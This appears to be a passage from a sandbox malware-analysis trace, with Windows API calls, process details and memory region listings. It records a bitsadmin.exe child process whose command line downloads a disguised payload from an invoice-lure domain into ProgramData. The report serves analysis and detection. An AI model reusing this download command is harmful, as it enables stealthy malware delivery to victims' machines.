[0071.099] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.100] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f110 | out: _Buffer="262144") returned 6
[0071.100] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f114 | out: _Buffer="1097216") returned 7
[0071.100] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18f110 | out: _Buffer="23") returned 2
[0071.100] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f0fc | out: lpSystemTimeAsFileTime=0x18f0fc*(dwLowDateTime=0xdafe1cd0, dwHighDateTime=0x1d469c7))
[0071.100] _finite (_X=0x2c61909f) returned 1
[0071.100] _finite (_X=0xd2444ba2) returned 1
[0071.100] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0bc | out: lpConsoleScreenBufferInfo=0x18f0bc) returned 1
[0071.100] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0x18f0d4, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0d4*=0x18) returned 1
[0071.100] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0c8 | out: lpConsoleScreenBufferInfo=0x18f0c8) returned 1
[0071.101] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x18f0e0, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0e0*=0xf) returned 1
[0071.101] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.101] _vsnwprintf (in: _Buffer=0x18eef4, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x18eeb8 | out: _Buffer="425.45 KB/S") returned 11
[0071.101] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0c0 | out: lpConsoleScreenBufferInfo=0x18f0c0) returned 1
[0071.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x18f0d8, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0d8*=0xc) returned 1
[0071.102] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f0c8 | out: lpConsoleScreenBufferInfo=0x18f0c8) returned 1
[0071.102] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x18f0e0, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f0e0*=0x10) returned 1
[0071.103] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.103] _vsnwprintf (in: _Buffer=0x18eef4, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x18eeac | out: _Buffer="2 Seconds") returned 9
[0071.103] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18f10c | out: lpConsoleScreenBufferInfo=0x18f10c) returned 1
[0071.103] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x18f124, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18f124*=0x9) returned 1
[0071.103] CoTaskMemFree (pv=0x2983e0)
[0071.104] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 0
[0071.104] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x18faa8*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0071.836] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 1
[0071.836] TranslateMessage (lpMsg=0x18fa80) returned 0
[0071.836] DispatchMessageW (lpMsg=0x18fa80) returned 0x1
[0071.836] IBackgroundCopyCallback:JobModification (This=0x299238, pJob=0x28a6a4, dwReserved=0x0) returned 0x0
[0071.836] IBackgroundCopyJob:GetState (in: This=0x28a614, pVal=0x299244 | out: pVal=0x299244) returned 0x0
[0071.837] IBackgroundCopyCallback:JobTransferred (This=0x299238, pJob=0x28a6a4) returned 0x0
[0071.837] IBackgroundCopyJob:GetState (in: This=0x28a614, pVal=0x299244 | out: pVal=0x299244) returned 0x0
[0071.837] IBackgroundCopyJob:GetType (in: This=0x28a614, pVal=0x18e0b4 | out: pVal=0x18e0b4) returned 0x0
[0071.838] IBackgroundCopyJob:GetProgress (in: This=0x28a614, pVal=0x299248 | out: pVal=0x299248) returned 0x0
[0071.839] IBackgroundCopyJob:GetPriority (in: This=0x28a614, pVal=0x18e0b0 | out: pVal=0x18e0b0) returned 0x0
[0071.840] CoTaskMemFree (pv=0x0)
[0071.840] IBackgroundCopyJob:GetDisplayName (in: This=0x28a614, pVal=0x18e0c8 | out: pVal=0x18e0c8*="msd5") returned 0x0
[0071.841] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e070 | out: lpConsoleScreenBufferInfo=0x18e070) returned 1
[0071.841] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x18e088 | out: lpNumberOfCharsWritten=0x18e088) returned 1
[0071.841] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x18e088 | out: lpNumberOfAttrsWritten=0x18e088) returned 1
[0071.842] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0071.842] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.842] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e05c | out: lpConsoleScreenBufferInfo=0x18e05c) returned 1
[0071.842] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18e074, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e074*=0xa) returned 1
[0071.843] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e058 | out: lpConsoleScreenBufferInfo=0x18e058) returned 1
[0071.843] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18e070, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e070*=0x5) returned 1
[0071.843] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.843] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e060 | out: lpConsoleScreenBufferInfo=0x18e060) returned 1
[0071.844] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x18e078, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e078*=0x7) returned 1
[0071.844] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.844] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e054 | out: lpConsoleScreenBufferInfo=0x18e054) returned 1
[0071.844] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18e06c, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e06c*=0x8) returned 1
[0071.845] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e05c | out: lpConsoleScreenBufferInfo=0x18e05c) returned 1
[0071.845] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18e074, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e074*=0x8) returned 1
[0071.845] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.845] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e050 | out: lpConsoleScreenBufferInfo=0x18e050) returned 1
[0071.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x18e068, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e068*=0xd) returned 1
[0071.846] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e060 | out: lpConsoleScreenBufferInfo=0x18e060) returned 1
[0071.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18e078, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e078*=0xa) returned 1
[0071.846] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e048 | out: lpConsoleScreenBufferInfo=0x18e048) returned 1
[0071.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x18e060, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e060*=0xa) returned 1
[0071.847] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e050 | out: lpConsoleScreenBufferInfo=0x18e050) returned 1
[0071.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18e068, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e068*=0x8) returned 1
[0071.848] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.848] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18e074 | out: _Buffer="1") returned 1
[0071.848] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18e080 | out: _Buffer="1") returned 1
[0071.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e050 | out: lpConsoleScreenBufferInfo=0x18e050) returned 1
[0071.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x18e068, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e068*=0x5) returned 1
[0071.849] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0071.849] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e058 | out: lpConsoleScreenBufferInfo=0x18e058) returned 1
[0071.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x18e070, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e070*=0x8) returned 1
[0071.849] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.850] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18e07c | out: _Buffer="1097216") returned 7
[0071.850] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18e080 | out: _Buffer="1097216") returned 7
[0071.850] _vsnwprintf (in: _Buffer=0xc503f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x18e07c | out: _Buffer="100") returned 3
[0071.850] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e078 | out: lpConsoleScreenBufferInfo=0x18e078) returned 1
[0071.850] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0x18e090, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e090*=0x18) returned 1
[0071.850] CoTaskMemFree (pv=0x2983e0)
[0071.850] IBackgroundCopyJob:Complete (This=0x28a614) returned 0x0
[0071.857] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e07c | out: lpConsoleScreenBufferInfo=0x18e07c) returned 1
[0071.858] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e050 | out: lpConsoleScreenBufferInfo=0x18e050) returned 1
[0071.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x18e068, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e068*=0x2) returned 1
[0071.858] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e050 | out: lpConsoleScreenBufferInfo=0x18e050) returned 1
[0071.858] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc443c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x18e068, lpReserved=0x0 | out: lpBuffer=0xc443c4*, lpNumberOfCharsWritten=0x18e068*=0x14) returned 1
[0071.858] GetCurrentThreadId () returned 0xc9c
[0071.858] PostThreadMessageW (idThread=0xc9c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0071.859] PeekMessageW (in: lpMsg=0x18fa80, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fa80) returned 1
[0071.859] IUnknown:Release (This=0x28a614) returned 0x1
[0071.859] IUnknown:Release (This=0x28a53c) returned 0x0
[0071.860] CoUninitialize ()
[0071.860] IUnknown:Release (This=0x299238) returned 0x2
[0071.860] IUnknown:Release (This=0x299238) returned 0x1
[0071.860] IUnknown:Release (This=0x299238) returned 0x0
[0071.860] IUnknown:Release (This=0x28a614) returned 0x1
[0071.860] CoTaskMemFree (pv=0x299238)
[0071.864] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0071.864] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0071.864] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0071.864] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0071.864] CloseHandle (hObject=0x80) returned 1
[0071.864] exit (_Code=0)
Thread:
id = 154
os_tid = 0xcb0
Thread:
id = 155
os_tid = 0xcb4
Thread:
id = 159
os_tid = 0xcc4
Thread:
id = 160
os_tid = 0xcc8
Process:
id = "15"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be620"
os_pid = "0xcd4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmgx.gif.zip?482400544 C:\\ProgramData\\tempa\\marxvxinhhmgx.gif"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1629
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1630
start_va = 0x30000
end_va = 0x6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1631
start_va = 0x70000
end_va = 0x73fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 1632
start_va = 0x80000
end_va = 0x80fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000080000"
filename = ""
Region:
id = 1633
start_va = 0xe30000
end_va = 0xe73fff
entry_point = 0xe30000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 1634
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1635
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1636
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 1637
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 1638
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 1639
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1640
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1641
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1642
start_va = 0x100000
end_va = 0x1c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1643
start_va = 0x1f0000
end_va = 0x2effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1644
start_va = 0x4b0000
end_va = 0x4bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004b0000"
filename = ""
Region:
id = 1645
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1646
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1647
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1648
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1649
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1650
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1651
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1652
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1653
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1654
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1655
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1656
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1657
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1658
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1659
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1660
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1661
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1662
start_va = 0x1d0000
end_va = 0x1d6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1663
start_va = 0x1e0000
end_va = 0x1e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1664
start_va = 0x2f0000
end_va = 0x3f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 1665
start_va = 0x400000
end_va = 0x400fff
entry_point = 0x400000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1666
start_va = 0x410000
end_va = 0x410fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 1667
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 1668
start_va = 0xe80000
end_va = 0x1a7ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e80000"
filename = ""
Region:
id = 1669
start_va = 0x430000
end_va = 0x48bfff
entry_point = 0x430000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1670
start_va = 0x430000
end_va = 0x48bfff
entry_point = 0x430000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1671
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1672
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1673
start_va = 0x4c0000
end_va = 0x5dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004c0000"
filename = ""
Region:
id = 1674
start_va = 0x4c0000
end_va = 0x59efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 1675
start_va = 0x5a0000
end_va = 0x5dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1676
start_va = 0x430000
end_va = 0x430fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 1677
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1678
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1679
start_va = 0x440000
end_va = 0x440fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 1680
start_va = 0x770000
end_va = 0x7affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000770000"
filename = ""
Region:
id = 1681
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 1682
start_va = 0x7e0000
end_va = 0x81ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 1683
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1684
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1685
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1686
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1687
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1688
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1689
start_va = 0x450000
end_va = 0x48bfff
entry_point = 0x450000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1690
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
